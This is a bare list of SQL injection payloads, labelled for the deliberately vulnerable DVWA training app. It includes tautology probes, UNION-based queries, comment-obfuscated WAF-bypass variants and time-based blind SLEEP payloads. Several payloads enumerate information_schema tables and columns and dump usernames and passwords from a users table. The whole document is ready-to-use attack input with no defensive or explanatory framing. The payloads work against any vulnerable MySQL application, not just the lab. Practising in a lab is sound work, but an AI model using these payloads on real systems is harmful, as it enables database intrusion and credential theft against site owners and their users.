# --- [ Numeric Entry Points - Best for DVWA Medium ] ---
1 OR 1=1
1 AND 1=1
1 OR true
1 UNION SELECT 1,2
1 UNION SELECT database(),user()
1 UNION SELECT NULL,NULL
1 GROUP BY 2
1 OR 8=8
1 AND 0 UNION SELECT ALL 1,2

# --- [ Obfuscated Numeric Seeds ] ---
1 || 2=2
1 && 3=3
1 XOR 1=2
1 UNION/*bypass*/SELECT 1,2
1/*!50000UNION*//*!50000SELECT*/1,2

# --- [ Blind/Time Based ] ---
1 AND SLEEP(5)
1 OR SLEEP(5)
1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)

1 UNION SELECT 1,2
1 UNION SELECT user(),database()
1 AND 1=1 UNION SELECT 1,2

# --- [ Advanced Data Extraction - Numeric ] ---
1 UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
1 UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name='users'
1 UNION SELECT user,password FROM users
1 UNION SELECT 1,concat(user,0x3a,password) FROM users

# --- [ WAF Bypass Evolution ] ---
1 UNION/*bypass*/SELECT/*bypass*/1,database()
1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
1 OR (SELECT 1+1)=2
